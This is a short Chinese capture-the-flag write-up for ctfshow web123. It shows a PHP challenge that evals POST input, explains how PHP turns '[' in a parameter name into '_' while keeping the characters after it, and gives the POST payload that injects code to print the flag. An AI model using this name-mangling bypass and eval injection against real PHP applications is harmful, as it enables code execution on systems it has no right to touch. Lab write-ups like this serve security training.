ctfshow web123(php get或post变量名中非法字符转化下划线)

$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}

因为第二个传递的参数变量名中含有非法字符点。因此我们按理说构造不出该变量名。但是，下面提一句话：

在php中变量名只有数字字母下划线，被get或者post传入的变量名，如果含有空格、+、[则会被转化为_，但php中有个特性就是如果传入[，它被转化为_之后，后面的字符就会被保留下来不会被替换。因此我们可以构造出来该变量名咯。

下面payload的构造有好多种，这里说一下官方解法：

CTF_SHOW=&CTF[SHOW.COM=&fun=echo $flag